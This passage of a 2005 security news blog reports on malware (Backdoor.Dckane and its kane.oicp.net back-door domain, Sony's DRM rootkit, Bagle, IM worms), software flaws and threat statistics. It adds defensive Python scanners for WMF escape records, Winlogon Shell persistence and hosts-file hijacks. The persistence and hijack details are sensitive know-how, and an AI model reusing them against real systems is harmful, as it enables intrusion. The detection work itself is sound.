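        if func == META_ESCAPE and size_words >= 4:
            escape_fn = struct.unpack_from("<H", data, off + 6)[0]
            if escape_fn == SETABORTPROC:
                findings.append((off, "SETABORTPROC escape"))
        off = end
    return findings


# Constructed samples: a benign file and one carrying the escape record.
BENIGN = build_wmf([(0x0103, struct.pack("<H", 8)),         # META_SETMAPMODE
                    (META_EOF, b"")])
SUSPECT = build_wmf([
    (0x0103, struct.pack("<H", 8)),
    (META_ESCAPE, struct.pack("<HH", SETABORTPROC, 0)),     # escape fn, byte count
    (META_EOF, b""),
])

if __name__ == "__main__":
    print("benign :", scan_wmf(BENIGN))
    print("suspect:", scan_wmf(SUSPECT))
```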

Thursday, December 29, 2005

Backdoor.Dckane is a back door program that allows a remote attacker to have unauthorized access to the compromised computer.
When Backdoor.Dckane is executed, it performs the following actions:
- Creates the following files:
%Windir%\kane.exe
%System%\kane.dll
Note:
- %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
- %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows (Windows 95/98/Me/XP) or C:\Winnt (Windows NT/2000).
- Modifies the value:
"Shell" = "Explorer.exe kane.exe" in the registry subkey HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon so that it runs every time Windows starts.
- Attempts to inject itself into Explorer.exe.
- Opens a back door on the compromised computer by connecting to the kane.oicp.net domain.
- Listens and awaits commands from a remote attacker.
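The Winlogon "Shell" change is the persistence hook worth checking for. The script below is an added example (not Symantec's write-up or tooling) that parses the text of a `reg export` of the Winlogon keys and reports any program in the Shell value other than explorer.exe; the .reg sample is constructed to mirror the modification described above.

```python
import re

EXPECTED_SHELL = "explorer.exe"
# Winlogon reads Shell as a list of programs; the sample in the text uses a
# space separator, a comma is accepted as well, and entries may be quoted.
SEPARATORS = " ,\t"


def split_shell_value(value):
    """Split a Shell value into program entries, keeping quoted paths intact."""
    entries, current, quoted = [], "", False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        elif ch in SEPARATORS and not quoted:
            if current:
                entries.append(current)
                current = ""
        else:
            current += ch
    if current:
        entries.append(current)
    return entries


def program_name(entry):
    """Case-folded file name of an entry, with any directory stripped."""
    return entry.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_shell_entries(value):
    """Every program in the Shell value that is not explorer.exe."""
    return [e for e in split_shell_value(value) if program_name(e) != EXPECTED_SHELL]


# Matches a REG_SZ line in a .reg export:  "Shell"="..."
SHELL_LINE = re.compile(r'^"Shell"="(.*)"$')


def scan_reg_export(text):
    """Scan the text of a .reg export; return {key: [extra programs]} for every
    Winlogon key whose Shell value launches something besides explorer.exe."""
    hits, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        if key is None or not key.lower().endswith("\\winlogon"):
            continue
        m = SHELL_LINE.match(line)
        if m:
            value = re.sub(r'\\(["\\])', r"\1", m.group(1))  # undo .reg escaping
            extras = suspicious_shell_entries(value)
            if extras:
                hits[key] = extras
    return hits


# Constructed .reg export modelled on the Dckane modification described above.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe kane.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="\"C:\\WINDOWS\\explorer.exe\""
'''

if __name__ == "__main__":
    for key, extras in scan_reg_export(SAMPLE_REG).items():
        print(f"{key}: unexpected shell program(s) {extras}")
```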

Linux.Mare is a worm that spreads by exploiting the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm, which has back door capabilities, also downloads and executes remote files on the compromised computer.

Monday, December 26, 2005
The Troj/Stinx-E Trojan horse appears to have been deliberately spammed out to email addresses, posing as a message from a British business magazine.
It exploits the controversial Sony DRM (Digital Rights Management) copy protection included on some of the music giant's CDs.
Typical emails look as follows:
Subject: Photo Approval Deadline
Message body:
Hello,
Your photograph was forwarded to us as part of an article we are publishing for our December edition of Total Business Monthly. Can you check over the format and get back to us with your approval or any changes? If the picture is not to your liking then please send a preferred one. We have attached the photo with the article here.
If the attached program is run, the Trojan horse copies itself to a file called $sys$drv.exe. Any file with $sys$ in its name is automatically cloaked by Sony's copy-protection code, making it invisible on computers which have used CDs carrying Sony's copy protection.
"Despite its good intentions in stopping music piracy, Sony's DRM copy protection has opened up a vulnerability which hackers and virus writers are now exploiting," said Graham Cluley, senior technology consultant for Sophos. "We wouldn't be surprised if more malware authors try and take advantage of this security hole, and consumers and businesses alike would be sensible to protect themselves at the earliest opportunity."
Sophos plans to issue a tool later today which will detect the existence of Sony's DRM copy-protection on Windows computers, disable it, and prevent it from re-installing.
"Sophos is acting on customers' concern that the software on Sony's CDs is introducing a vulnerability which hackers and virus writers are able to exploit," explained Cluley. "We will give customers the ability to determine if their computers suffer from the vulnerability and remove it if necessary."

Wednesday, December 14, 2005

Microsoft this week fixed a widely reported flaw in its Internet Explorer (IE) browser that had been used by attackers over the past few weeks to take over the PCs of unsuspecting users. The flaw was one of four IE bugs fixed Tuesday in Microsoft's regularly scheduled software update.
Although attacks based on the vulnerability have not been widespread, it is important that IE users now install the patch. "But isolated attackers here and there have used it to install malware."
Microsoft fixed this problem, along with the other three IE bugs, in one of two security updates, released Tuesday. More details on the IE fixes can be found in the MS05-054 Security Bulletin here. This update is rated "critical" by Microsoft.
A second update, assigned Microsoft's less severe security rating of "important," fixes a problem in the Windows 2000 kernel. That update can be found here. This bug could help an attacker to circumvent Microsoft's user privileges mechanism and perform unauthorized tasks on a PC.
Typically, this flaw could not be exploited remotely, as it requires that the attacker gain access to the targeted computer's keyboard, said Steve Manzuik, security product manager with the company that discovered the bug, eEye Digital Security. Its advisory may be read here.

Tuesday, December 13, 2005
A new flavor of Sober set for Jan 5 2006
Time is short and people maintain a level of ignorance and simple stupidity that is outstanding.
Warnings are everywhere: USA Today! Yahoo News!
A recent report by America Online and the National Cyber Security Alliance found that up to 81% of respondents had no security controls. Of that number, 56% did not have any antivirus software or had software that had not been updated in the past week, and 44% had an improperly configured firewall. As for spyware, 38% said they had no antispyware protection at all.
What began as a relatively unsophisticated worm, has now become a leading threat with modifications by the author. One e-mail gateway has logged millions of interceptions of Sober on a daily basis, racking up 94 million during the big outbreak in November.
Security experts also said the worm appears to be timed to coincide with a major German political convention the next day to increase the worm's notoriety and to help spread it.

Thursday, December 08, 2005
Is the web uninstall of Sony DRM leaving the system more open due to the ActiveX object needed to get it removed? Honestly I cannot understand how a company can do this without legal people doing something.
Matti Nikki of Finland was the first to figure out just what the uninstaller was doing. It seems the uninstaller puts an ActiveX control called CodeSupport on the target machine even before the uninstall URL can be obtained.
The control is marked "safe for scripting" and remains this way on the machine even after the uninstall process is concluded.
What this means is that any remote user can use the methods of this control to do anything. Here's the list of methods that Muzzy found:
GenerateRequestPacket
ExecuteCode (can crash browser)
Uninstall
RebootMachine (exploitable; Muzzy has a demo that may make the situation worse)
GetProgress
OnLoaded
InitializeDiscScan
GetNumberOfDiscs
IsDRMServerValid
GetAlbumArtist
GetAlbumName
GetMaxBurnCount
GetCurrentBurnCount
GenerateIncrementPacket
IsContentOwnerValid
DoIncrement
GetInstalledSoftwareVersion
IsXCPDiscPresent
InstallUpdate (possibly exploitable, downloads given a URL)
GetInstallProgress
GetCompletionStatus
IsXCPDiscPresentAsLong
IsAdministrator
It was at this point that Ed Felten and Alex Halderman of Princeton got involved on their Freedom to Tinker Weblog. They realized that the CodeSupport control would allow any Web page to download, install and run any code it wants to on your computer, since Code Support doesn't verify that it is only working with the uninstaller code it was supposed to deal with.
Halderman and Felten have written exploits (that they are not making public) to verify that this can occur. While Sony has replaced the Web-based installer with a downloadable .exe file, it remains unclear at this point (given the company's track record) whether the new installer is safe to use.
There is a simple way suggested by Halderman and Felten to remove the CodeSupport component from Windows if you have been affected.
From the Start Menu, choose Run, and then type the following (between the brackets without typing the brackets) into the box that appears.
[cmd /k del "%windir%\downloaded program files\codesupport.*"]
That should delete all files associated with control. Please understand that you do this at your own risk, since your security settings may not prevent the software from being installed again.

The sharp rise in rootkit detections on Windows machines is a direct result of adware/spyware vendors using sophisticated techniques to hide processes and prevent uninstall, according to anti-virus vendor F-Secure Corp.
F-Secure the Finnish company, which ships an anti-rootkit scanner in its security suite, has identified ContextPlus, Inc., makers of the Apropos and PeopleOnPage adware programs, as the company responsible for a large number of stealth rootkit infections.
F-Secure chief incident officer Mikko Hypponen said the company's BlackLight technology has discovered the use of "very advanced rootkit technologies" in Apropos, a spyware program that collects users' browsing habits and system information and reports back to the ContextPlus servers.
Like the typical spyware application, Apropos uses the data to serve targeted pop-up advertisements while the user is surfing the Web. Unlike the average worm or bot that use rootkit technologies to avoid detection, Hypponen said the rootkit features built into Apropos aren't being used to hide the existence of the program on the machine.
They're using a very sophisticated kernel-mode rootkit that allows the program to hide files, directories, registry keys and processes. The rootkit fitted into Apropos is implemented by a kernel-mode driver that starts automatically early in the boot process. When the files and registry keys have been hidden, no user-mode process is allowed to access them.

A new malicious worm squirming through America Online Inc.'s AIM network has the ability to carry on an instant messaging conversation with potential victims.
Researchers at IMLogic Inc.'s Threat Center spotted the new threat and warned that virus writers are continuing to push the social engineering envelope to trick computer users into downloading nasty malware programs.
The newest worm, identified as IM.Myspace04.AIM, is coded to chat and persuade the victim to click on a malicious URL embedded in the IM message. If the first attempt at infection is unsuccessful and the victim replies to doubt the legitimacy of the link being sent, the worm replies with the following message: "lol no its not its a virus."
Like other IM worms spreading over AOL's instant messaging network, the bot uses an infected user's buddy list to propagate itself, carrying on a conversation with new victims without the infected user's knowledge.
"This sophisticated bot attack is programmed such that infected users cannot see the messages the worm is sending on their behalf. When recipients of the malicious message reply to the infected user, the bot running on the infected machine sends follow-up messages," IMlogic said in an advisory.

Wednesday, December 07, 2005
On 12-4-2005 I reported this flaw in IE and it seems that Google has adjusted their code to adjust for the IE Flaw.
Google Inc. has made an "adjustment" to its Google Desktop application to protect users from an unpatched design flaw in Microsoft Corp.'s Internet Explorer browser. "We have made an adjustment to the product to help protect users," said Google spokesperson Sonya Boralv. She declined to provide details on the extent of the Google Desktop modifications.
Boralv said users aren't required to take any action to get protected because the changes were made "on our end" to block the remote access attack vector.

Sunday, December 04, 2005

A bug in Microsoft Corp.'s Internet Explorer Web browser gives phishers a way to scan the hard drives of Google Desktop users, according to an Israeli hacker. Because of a flaw in the way Internet Explorer processes Web pages, a malicious Web site could use the attack to steal sensitive information such as credit card numbers or passwords from the hard drives of its visitors.
"Google Desktop users who use IE are currently completely exposed," hacker Matan Gillon said via e-mail. "An experienced attacker can covertly harvest their hard drives for sensitive information such as passwords and credit card numbers. Since Google also indexes e-mails which can be read in the Web interface itself, it's also possible to access them using this attack." Full Article

Tuesday, November 29, 2005

Recently my own anti-virus software attacked and removed a .dll within the installed path of QuickTime Player. This caused me a good deal of concern. I assumed at first that the anti-virus software was being overzealous. Today I was trying to remove the QuickTime Player and thought I would simply uninstall and reinstall a new version. This is where we all start laughing out loud.
Well no big deal I thought, just go trash all the keys. I had no idea just how many keys were associated with this software. Go Apple! So after about a half hour of trashing the keys I decided I would look into the problem before I reinstall. I was a bit taken in by the topic I was exploring here. Seems when it comes to Apple everyone acts like no negative comments can be made. Personally I have the solution to this problem. Remove it until Apple decides to get it right. I am quickly reminded of the Sony deal. Are companies actually no longer responsible for setting people up to Remote Code Execution?
eEye Security has posted these short bits on their site. EEYEB-20051031 | EEYEB-20051117a | EEYEB-20051117b
Researchers at eEye Digital Security have taken a bite out of two popular Apple Computer Inc. products, flagging two critical vulnerabilities in the iTunes and QuickTime applications.
The flaws, which put millions of Windows users at risk of code execution attacks, remain unpatched.
Steve Manzuik, security product manager on eEye's research team, said the newest version of iTunes, which was released by Apple earlier this month, contains the vulnerability.
eEye, of Aliso Viejo, Calif., has posted two brief notices on its Web page for upcoming advisories warning that the flaws carry a "high risk" label. "Full Article"

Tuesday, November 22, 2005
Search engine darling Google Inc. has issued a patch to cover a range of potentially dangerous security flaws in the enterprise-facing Google Mini search appliance.
The company's patch was issued after researchers at the Metasploit Project pinpointed several bugs that can be exploited by malicious hackers to conduct cross-site scripting, file discovery and service enumeration attacks.
Metasploit creator H.D. Moore warned in an advisory that the most serious bug can lead to arbitrary command execution.
Security alerts aggregator Secunia Inc. rates the flaws as "highly critical."
According to Moore, Google's patch and advisory were only released to businesses that pay about $3,000 for the pizza box-sized appliance.
A spokesperson for Google said the company learned of the issue several months ago and quickly made a patch available to all enterprise customers. "No customers have reported any effect related to this issue," he added.
Metasploit's Moore said the flaw was discovered in a feature that allows customization of the Google Mini's search interface through XSLT (Extensible Stylesheet Language Transformations) style sheets. He explained that certain versions of the appliance allow a remote URL to be supplied as the path to the XSLT style sheet, and warned that the feature can be abused to perform malicious hacking attacks.

The computer security research organization's report reveals that cyber criminals have shifted targets. Over the past five years, most hackers went after operating systems and Internet services like Web servers and E-mail servers. In 2005, they took aim at software applications.
The applications under fire span a variety of operating systems. They include enterprise backup software, anti-virus software, PHP applications, database software, peer-to-peer file sharing software, DNS software, media player software, IM software, and Internet browsers.
The second major finding of the report is that vulnerabilities in network operating systems such as Cisco's Internetwork Operating System (IOS), which powers most of the routers and switches on the Internet, represent a significant threat.
"The bottom line is that security has been set back nearly six years in the past 18 months," Alan Paller, director of research for the SANS Institute, wrote in an E-mail. "Six years ago, attackers targeted operating systems and the operating system vendors didn't do automated patching. In the intervening years, automated patching protected everyone from government to grandma. Now the attackers are targeting popular applications, and the vendors of those applications do not do automated patching."
Security experts credit Microsoft's efforts to improve its software with forcing hackers to look for lower hanging fruit. Part of the reason we're seeing more of the attacks go against things other than the Windows operating system is that the Windows operating system has gotten better.
Full Article

Friday, November 18, 2005

Trust SONY ?
On Oct. 31, Mark Russinovich broke the story in his blog: Sony BMG Music Entertainment distributed a copy-protection scheme with music CDs that secretly installed a rootkit on computers. This software tool is run without your knowledge or consent -- if it's loaded on your computer with a CD, a hacker can gain and maintain access to your system and you wouldn't know it.
The Sony code modifies Windows so you can't tell it's there, a process called "cloaking" in the hacker world. It acts as spyware, surreptitiously sending information about you to Sony. And it can't be removed; trying to get rid of it damages Windows.
This story was picked up by other blogs (including mine), followed by the computer press. Finally, the mainstream media took it up.
The outcry was so great that on Nov. 11, Sony announced it was temporarily halting production of that copy-protection scheme. That still wasn't enough -- on Nov. 14 the company announced it was pulling copy-protected CDs from store shelves and offered to replace customers' infected CDs for free.
Full story here.

Friday, November 11, 2005

Digital media delivery firm RealNetworks Inc. late Thursday shipped a major security update for its RealPlayer software to patch a pair of remote code execution vulnerabilities.
The security holes, which were reported to RealNetworks more than four months ago, could be exploited by malicious hackers to take complete control over a vulnerable machine.
According to eEye Digital Security, the company that discovered the bugs, the most serious flaw exists in the first data packet contained in a Real Media file.
By specially crafting a malformed ".rm" movie file, a direct stack overwrite is triggered, and reliable code execution is possible.
Affected software includes RealPlayer 8, RealPlayer 10, RealOne Player v1, RealOne Player v2 and RealPlayer Enterprise (Windows); RealPlayer 10 (Mac); RealPlayer 10 and Helix Player (Linux).

Thursday, November 03, 2005

Two new versions of a virus first reported in May are staging renewed attacks against computers in Russia, encrypting files and then extorting money from victims to decode the files.
After an infection, the Russian-language instructions let victims know how many of their files have been encrypted. Translated, the warning says, "If you want to get these damn files in the decrypted format" then write to the e-mail address given. The message goes on to say, "P.S. And be thankful that they were not completely erased!"
The viruses, called JuNy.A and JuNy.B, search for more than 100 file types by extension, according to a warning issued by Websense Inc. The renewed attack was first reported on a weblog published by Kaspersky Lab Ltd.
It's suspected that the virus enters a computer after a user visits a certain Web site and then exploits a vulnerability. Another theory is the virus is activated after a user runs some type of executable code containing the virus. In the last couple of years, however, virus writers have moved away from writing malicious code simply to display their skills and are increasingly trying to make money.
Trend offers some removal information. Troj_Juny.A Troj_Juny.B

Monday, October 31, 2005
Timing their effort to coincide with national Cyber Security Awareness Month and Halloween, the U.S. Federal Trade Commission (FTC), Consumer Action and Microsoft are urging consumers to protect themselves from the threat of zombies, computers that are infected with malicious code so they can be controlled remotely by other people for illegal purposes.
"The only way to slow the spread of zombies and other online threats is by going after them as resolutely and in as many ways as possible," says Tim Cranton, director of Microsoft's Internet Safety Enforcement programs.
Microsoft maintains more than 130,000 MSN Hotmail "trap" accounts to investigate patterns within spam. These accounts catch e-mail sent by spammers to potential e-mail addresses. But, as all spam investigators quickly learn, investigating spam after it's delivered is like tracing an unwanted letter with an illegible (or fake) return address. Most spammers protect their identities by sending mail through zombies or using other masquerading tricks, making it fruitless to trace spammers based on the name listed in the "From" line in the e-mail's header.
But Microsoft's zombie investigation gave the company new insight into how it, as a technology developer and e-mail provider, can fight spam and zombies, as well as how to fight the creators of zombies in court.
"By inserting ourselves in the spammers' path and looking upstream, we have been able to see things we have never been able to see before," Cranton says.
Specifically, Microsoft was able to uncover the IP addresses of the computers that were sending spamming requests to the quarantined zombie, along with the addresses of the Web sites advertised in the spam.
To prove these spamming requests were not isolated examples, Microsoft compared the Web sites advertised in the quarantined zombie's spam to those listed in spam in the MSN Hotmail trap accounts.
Cranton says the researchers found numerous identical matches, and were able to determine that approximately 13 distinct spamming operations either helped create or exploit the zombie code placed on the quarantined computer.
These spammers, who are currently unidentified, are named as "John Doe" defendants in the civil lawsuit Microsoft filed in state court in King County, Wash., on Aug. 17. Filing a "John Doe" lawsuit allows Microsoft to use legal discovery tools – such as third-party subpoenas – to help learn the defendants' true identities.

Sunday, October 30, 2005

A rootkit is being spread through AOL's popular instant messaging client and AOL chat rooms.
Bundled within the previously identified W32/Sdbot-ADD worm, the lockx.exe rootkit file is installed when users click on the file link within the IM window. Though neither the worm nor the rootkit file are new, it appears to be the worm's first foray into the AIM (AOL's Instant Messenger) network. What's more troubling is that rootkits haven't previously been spread via IM.
Attackers can automatically pass the worm along to users on the Buddy List. Additionally, the rootkit can shut down anti-virus software, alter the users' search page, run CPU usage to 100 percent and automatically download unwanted programs such as 180Solutions, Zango, MaxSearch and others.

Wednesday, October 26, 2005
The Measurement Factory has conducted two surveys of Internet-connected domain name servers (DNS) on behalf of Infoblox. The surveys consisted of several queries directed at each of a large set of external DNS servers to estimate the number of systems deployed today and determine specific configuration details.
The survey results revealed that many organizations often disregard these critical systems, which perform the functions necessary to make their presence available and accessible on the Internet. The Internet Systems Consortium's BIND software, which performs the domain name resolution function, is often out of date, opening the door to malicious attacks. And, the systems are sometimes mis-configured, potentially compromising network availability.
Following is a summary of the significant survey results:
There are an estimated 7.5 million external DNS servers on the public Internet
Over 75% of domain name servers (of roughly 1.3 million sampled) allow recursive name service to arbitrary queriers. This opens a name server to both cache poisoning and denial of service attacks.
Over 40% allow zone transfers from arbitrary queriers. This exposes a name server to denial of service attacks and gives attackers information about internal networks.
In almost 33% of the cases, all authoritative name servers for a zone were on the same /24 subnetwork. This leaves the network open to accidental and deliberate denial of service attacks.
Only 60% of the name server records delegating each zone matched the intrazone name server records. Mismatched records may decrease the number of servers available for resolution, reduce redundancy, increase load, and leave a zone susceptible to denial of service attacks.
57% run the most recent, secure versions of BIND (9.x):
BIND 9.3, 9.2, 9.1: 57%
BIND 8.3, 8.2, 8.1: 20%
Windows 2000: 6.5%
Windows 2003: 3.5%
Other: 13%
For more information, a press release and reports including methodology, complete results and all findings are available.
Press release Report: June 2005 Report: April 2005
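Two of the survey findings above (delegation records that do not match the zone's own NS set, and every authoritative server sitting in one /24) are checks an operator can run against their own zones. The script below is an added example, not Infoblox's or The Measurement Factory's survey code; it takes the parent-side NS names, the in-zone NS names and the server addresses as inputs (constructed here, in practice gathered with a resolver) and reports the same conditions the survey counted.

```python
import ipaddress


def normalize(name):
    """Lower-case a DNS name and drop the trailing dot so presentation differences don't matter."""
    return name.lower().rstrip(".")


def delegation_mismatch(parent_ns, zone_ns):
    """Compare the NS names the parent delegates to with the NS RRset inside the zone.
    Returns (names only in the parent, names only in the zone); both empty means they match."""
    p = {normalize(n) for n in parent_ns}
    z = {normalize(n) for n in zone_ns}
    return sorted(p - z), sorted(z - p)


def single_subnet(addresses, prefix=24):
    """True when every IPv4 server address falls inside one /prefix network."""
    nets = {ipaddress.ip_network(f"{a}/{prefix}", strict=False)
            for a in addresses if ipaddress.ip_address(a).version == 4}
    return len(nets) == 1


def assess_zone(zone, parent_ns, zone_ns, addresses, min_servers=2):
    """Return warnings about a zone's delegation, following the survey's findings:
    mismatched NS records, all servers on one /24, too few distinct servers."""
    warnings = []
    only_parent, only_zone = delegation_mismatch(parent_ns, zone_ns)
    if only_parent or only_zone:
        warnings.append(f"{zone}: NS mismatch, parent-only={only_parent} zone-only={only_zone}")
    names = {normalize(n) for n in parent_ns} | {normalize(n) for n in zone_ns}
    if len(names) < min_servers:
        warnings.append(f"{zone}: fewer than {min_servers} distinct name servers")
    if addresses and single_subnet(addresses):
        warnings.append(f"{zone}: all authoritative servers in one /24 ({sorted(addresses)})")
    return warnings


# Constructed sample: parent and zone disagree on ns2/ns3, and both hosts share a /24.
SAMPLE = {
    "zone": "example.test",
    "parent_ns": ["ns1.example.test.", "ns2.example.test."],
    "zone_ns": ["NS1.example.test", "ns3.example.test"],
    "addresses": ["192.0.2.10", "192.0.2.20"],
}

if __name__ == "__main__":
    for warning in assess_zone(**SAMPLE):
        print(warning)
```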

Saturday, October 08, 2005
Last month, Microsoft issued no new security bulletins as part of its monthly update.
This month, though, the tune has changed, as nine patches are on tap, some of them rated as "critical." According to reports, Windows XP itself may also be getting a Service Pack 3 release in 2006.
True to form, Microsoft is vague in its advance bulletins about patches and has not disclosed the specific issues that will be addressed. Eight of the issues set to be patched will involve Windows, and there's one that specifically affects Microsoft Exchange.
Internet Explorer is among the Windows applications that are likely to be patched. Security firm Secunia reports that there are numerous unpatched vulnerabilities in IE. Among them is the "XMLHTTP" HTTP Request Injection vulnerability which "can be exploited by malicious people to manipulate certain data and conduct HTTP request smuggling attacks."

Thursday, October 06, 2005

An Internet security specialist says a new threat forces computers to install faked Google software, which then goes phishing. Phishing is where e-mails, IM (instant messages) or Web sites parody a legitimate company, and try to get users to provide personal information or financial account numbers and passwords.
The latest cases involve bogus Google software spread via IM, and appear to be a variety of the infamous CoolWebSearch phishing scheme, according to Foster City-Calif.-based FaceTime Security Labs. CoolWebSearch has never been spread via IM before.
In the recent cases, IM users unwittingly download a rogue tool bar, which is installed on a Web browser and provides easier access to an Internet search provider.
The only working feature on the fake Google Toolbar saves credit card details, according to Christopher Boyd, the security research manager of Foster City, Calif.-based FaceTime Security Labs. A bevy of others, including one to "enable pornographic ads," do not work.
IM is increasingly a target of phishers, as the latest attacks show. "Full Article"

Monday, October 03, 2005
Can't we all just get along? Looking at all the data from a recent Bagle outbreak, most of the identifications are just "Bagle", but they're almost all different specific variants. Look at the confusion this causes, and specifically at the three big anti-virus companies: McAfee, Symantec and Trend Micro use names bearing no resemblance to each other.
In the heat of a malware outbreak there is usually a lot of confusion about what variant of what worm is involved. Is it just a new variant or a completely new worm? Inconsistencies between vendors about variant indices and virus names add to the confusion.
Larry Seltzer wrote a couple of articles on the topic and I am in total agreement. One can only guess at how confused a novice home user is by all the naming issues.
Finnish anti-virus specialist F-Secure has dived headfirst into the crowded anti-spyware market, rolling out a new consumer-facing security suite that promises to detect unwanted programs before a PC becomes infected.
F-Secure Corp.'s new F-Secure Internet Security 2006 offers technology to tackle the problem of inadvertently installed spyware and adware programs that sneak onto computers via file-sharing networks.
F-Secure is also the first vendor to ship rootkit detection technology in a consumer product offering, giving the company an early entry into a potentially lucrative market.
A rootkit is described as a malicious program that uses system hooks to conceal its presence on the system. For instance, it monitors whether the user opens the Windows Task Manager in order to keep itself out of the list of processes.
Security researchers have discovered evidence of malware writers using stealth rootkit features to hide spyware and other malicious programs on Windows machines. "Learn more"

Monday, September 26, 2005

The recent wave of Bagle variants is being spammed out in large quantities through distributed networks of compromised machines, called botnets. Some of the variants are older versions of the Bagle virus, repacked to avoid detection. The new Bagles are Trojan downloaders, which retrieve and install malicious files from a pre-programmed Web site location and create a backdoor on a machine. This distribution mechanism causes variants to spread outside of the spam channels and leaves unprotected users or systems with outdated virus signatures vulnerable to attack.
ESET is providing a free remover for the most prevalent variants of the Bagle worms, which can be downloaded at www.eset.com.
ESET's Virus Radar (www.virusradar.com), a real-time malware tracking tool, identified the new Bagle variants using NOD32. Virus Radar provides site visitors with easy access to in-depth analysis of the latest malicious outbreaks and processes approximately four million email messages per day to provide information such as the exact date a virus was first detected and its current detection rate. Virus Radar is also capable of tracking the progression of a single virus over a given period -- in some instances from the earliest heuristic detection of a new virus to the point where the virus disappears.

Wednesday, September 21, 2005

Security researchers at Panda Software say they have discovered a new worm that generates a spoofed version of Google, the Web's most popular search engine.
The company's PandaLabs unit reported late Friday that it had identified a worm it has labeled as P2Load.A that creates a fake Google site, and launches adware on infected computers.
The security software maker, which is based in Bilbao, Spain, said that the attack spreads via peer-to-peer, or P2P, computer networks, specifically the Shareaza and Imesh programs.
Panda said that the P2Load.A threat copies itself onto the shared directory of the P2P software as an executable file named after a Star Wars-themed video game, Knights of the Old Republic 2, and lures end users into launching the virus on their machines using a faked error message. Once the virus has been sprung, it immediately modifies the computer's start page, launches the adware and spoofs Google.
As part of its delivery function, the P2Load.A attack modifies an infected computer's Hosts file so that when an unsuspecting user attempts to call up the search engine, they are instead diverted to the mocked-up version of the site, which Panda said was hosted somewhere in Germany. The fraudulent page appears as an exact copy of Google and supports all 17 languages that the search site is offered in. The virus has also been designed to redirect people who mistype Google's URL into their browsers, and will pop up if someone mistakenly types wwwgoogle.com, www.gogle.com, or www.googel.com.
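Since the redirection described above works by rewriting the Hosts file, the entry is sitting there in plain text for anyone who looks. The following added example (my own code, not Panda's tooling) parses a hosts file and flags any watched domain, or a typo lookalike of it, that is mapped to something other than a loopback address. The sample hosts file, the WATCHED list and the 192.0.2.45 address are constructed for the example.

```python
import ipaddress

# Constructed hosts file (not from Panda's report): a clean loopback pair, a
# redirect of the real name, the three typo names the article lists, and an
# unrelated intranet entry that must not be flagged. 192.0.2.45 is a documentation address.
SAMPLE_HOSTS = """\
# hosts file, constructed sample
127.0.0.1       localhost
::1             localhost
192.0.2.45      www.google.com google.com
192.0.2.45      www.gogle.com www.googel.com wwwgoogle.com
10.0.0.5        intranet.corp.example
"""

# Names whose resolution you care about (constructed list; add your own sites).
WATCHED = ("google.com",)


def _osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so 'googel' is one step from 'google'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def _registrable(host):
    """Crude registrable domain: the last two labels (enough for .com style names)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def watched_lookalike(host, watched=WATCHED):
    """Return the watched domain that `host` is, or closely resembles, else None."""
    reg = _registrable(host)
    label = reg.split(".")[0]
    for w in watched:
        brand = w.split(".")[0]
        # exact name, brand embedded in the label (wwwgoogle), or one typo away
        if reg == w or brand in label or _osa_distance(label, brand) <= 1:
            return w
    return None


def find_hosts_hijacks(hosts_text, watched=WATCHED):
    """Return (line_no, name, address, watched_domain) for every watched or
    lookalike name mapped to a non-loopback address."""
    findings = []
    for line_no, raw in enumerate(hosts_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        address, names = fields[0], fields[1:]
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            continue                             # not a hosts entry
        if ip.is_loopback or ip.is_unspecified:
            continue                             # blackholing entries are not hijacks
        for name in names:
            target = watched_lookalike(name, watched)
            if target:
                findings.append((line_no, name, address, target))
    return findings


if __name__ == "__main__":
    for hit in find_hosts_hijacks(SAMPLE_HOSTS):
        print("line %d: %s -> %s (looks like %s)" % hit)
```

On Windows the file lives at %SystemRoot%\system32\drivers\etc\hosts, on Unix at /etc/hosts; read it and pass the contents to find_hosts_hijacks. Entries that point a watched name at 127.0.0.1 are deliberately left alone, since that is how ad-blocking hosts lists work, and any hit on a routable address deserves a look at who owns that address.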
-- Symantec observed that denial-of-service attacks grew from an average of 119 per day to 927 per day during the first half of 2005 -- a 680% increase over the previous reporting period. The most frequently targeted industry was education, followed by small business and financial services.
-- The time between the disclosure of a vulnerability and the release of associated exploit code decreased from 6.4 days to 6.0 days. In addition, an average of 54 days elapsed between the appearance of a vulnerability and the release of an associated patch by the affected vendor. This means that, on average, 48 days elapsed between the release of an exploit and the release of an associated patch; during this time, systems are either vulnerable or administrators are forced to create their own workarounds to protect against exploitation.
-- During the first half of 2005, Symantec documented 1,862 new vulnerabilities -- the highest number ever recorded in the Internet Security Threat Report. 97% of these vulnerabilities were classified as moderate or high in severity, and 59% of all vulnerabilities were found in Web application technologies, marking an increase of 59% over the previous reporting period and a 109% increase over the first six months of 2004.
-- A growing number of Win32 viruses and worm variants were also reported during the first half of 2005. Symantec documented 10,866 new Win32 virus and worm variants, an increase of 48% over the previous reporting period and 142% over the first half of 2004.
